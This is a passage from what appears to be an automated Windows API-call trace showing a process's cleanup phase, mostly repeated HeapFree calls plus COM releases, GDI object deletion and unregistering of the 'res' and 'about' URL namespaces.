returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449d30 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449bc0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.360] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449b00 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e6d0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449aa0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e6d0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e750 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e710 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e6f0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f400 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420dd0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d8a0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e5f0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420db0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e730 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420d90 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e5d0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d870 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d8d0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e470 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e670 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e650 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e630 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e610 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d930 | out: hHeap=0x3f0000) returned 1 [0082.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d900 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f440 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4458d0 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e3d0 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x436850 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x436900 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4369b0 | out: hHeap=0x3f0000) returned 1 [0082.364] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x459510 | out: hHeap=0x3f0000) returned 1 [0082.364] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44dc90 | out: hHeap=0x3f0000) returned 1 [0082.364] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4595f0 | out: hHeap=0x3f0000) returned 1 [0082.364] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497b0 | out: hHeap=0x3f0000) returned 1 [0082.364] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414300 | out: hHeap=0x3f0000) returned 1 [0082.364] IUnknown:Release (This=0x436b70) returned 0x0 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414200 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437200 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420c70 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x436340 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e5e0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x447540 | out: hHeap=0x3f0000) returned 1 [0082.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x43bb70 | out: hHeap=0x3f0000) returned 1 [0082.367] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x7feff1e0000 [0082.367] GetProcAddress (hModule=0x7feff1e0000, lpProcName=0xc9) returned 0x7feff1e1650 [0082.367] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.367] IInternetSession:UnregisterNameSpace (This=0x43ead0, pCF=0x7fef0004f60, pszProtocol="res") returned 0x0 [0082.367] IUnknown:Release (This=0x7fef0004f60) returned 0x1 [0082.367] IInternetSession:UnregisterNameSpace (This=0x43ead0, pCF=0x7fef0004fa0, pszProtocol="about") returned 0x0 [0082.367] IUnknown:Release (This=0x7fef0004fa0) returned 0x1 [0082.367] IUnknown:Release (This=0x43ead0) returned 0x1 [0082.367] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420c50 | out: hHeap=0x3f0000) returned 1 [0082.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e310 | out: hHeap=0x3f0000) returned 1 [0082.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418ba0 | out: hHeap=0x3f0000) returned 1 [0082.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420d30 | out: hHeap=0x3f0000) returned 1 [0082.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e3c0 | out: hHeap=0x3f0000) returned 1 [0082.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d780 | out: hHeap=0x3f0000) returned 1 [0082.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420730 | out: hHeap=0x3f0000) returned 1 [0082.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c2b0 | out: hHeap=0x3f0000) returned 1 [0082.369] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e200 | out: hHeap=0x3f0000) returned 1 [0082.369] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d7b0 | out: hHeap=0x3f0000) returned 1 [0082.369] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420d50 | out: hHeap=0x3f0000) returned 1 [0082.369] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44de90 | out: hHeap=0x3f0000) returned 1 [0082.369] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d750 | out: hHeap=0x3f0000) returned 1 [0082.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445570 | out: hHeap=0x3f0000) returned 1 [0082.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420b30 | out: hHeap=0x3f0000) returned 1 [0082.370] IUnknown:Release (This=0x43ec60) returned 0x0 [0082.370] DeleteObject (ho=0x44100b60) returned 1 [0082.370] DeleteObject (ho=0x31100258) returned 1 [0082.370] DeleteObject (ho=0x1410026e) returned 1 [0082.370] DeleteObject (ho=0xc100b5d) returned 1 [0082.370] DeleteObject (ho=0x2100b48) returned 1 [0082.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x433a30 | out: hHeap=0x3f0000) returned 1 [0082.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420990 | out: hHeap=0x3f0000) returned 1 [0082.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x433b40 | out: hHeap=0x3f0000) returned 1 [0082.370] DeleteDC (hdc=0x4010b37) returned 1 [0082.371] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41ae30 | out: hHeap=0x3f0000) returned 1 [0082.371] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4372a0 | out: hHeap=0x3f0000) returned 1 [0082.371] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41adc0 | out: hHeap=0x3f0000) returned 1 [0082.371] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437650 | out: hHeap=0x3f0000) returned 1 [0082.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437330 | out: hHeap=0x3f0000) returned 1 [0082.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41aea0 | out: hHeap=0x3f0000) returned 1 [0082.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445ba0 | out: hHeap=0x3f0000) returned 1 [0082.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41ad50 | out: hHeap=0x3f0000) returned 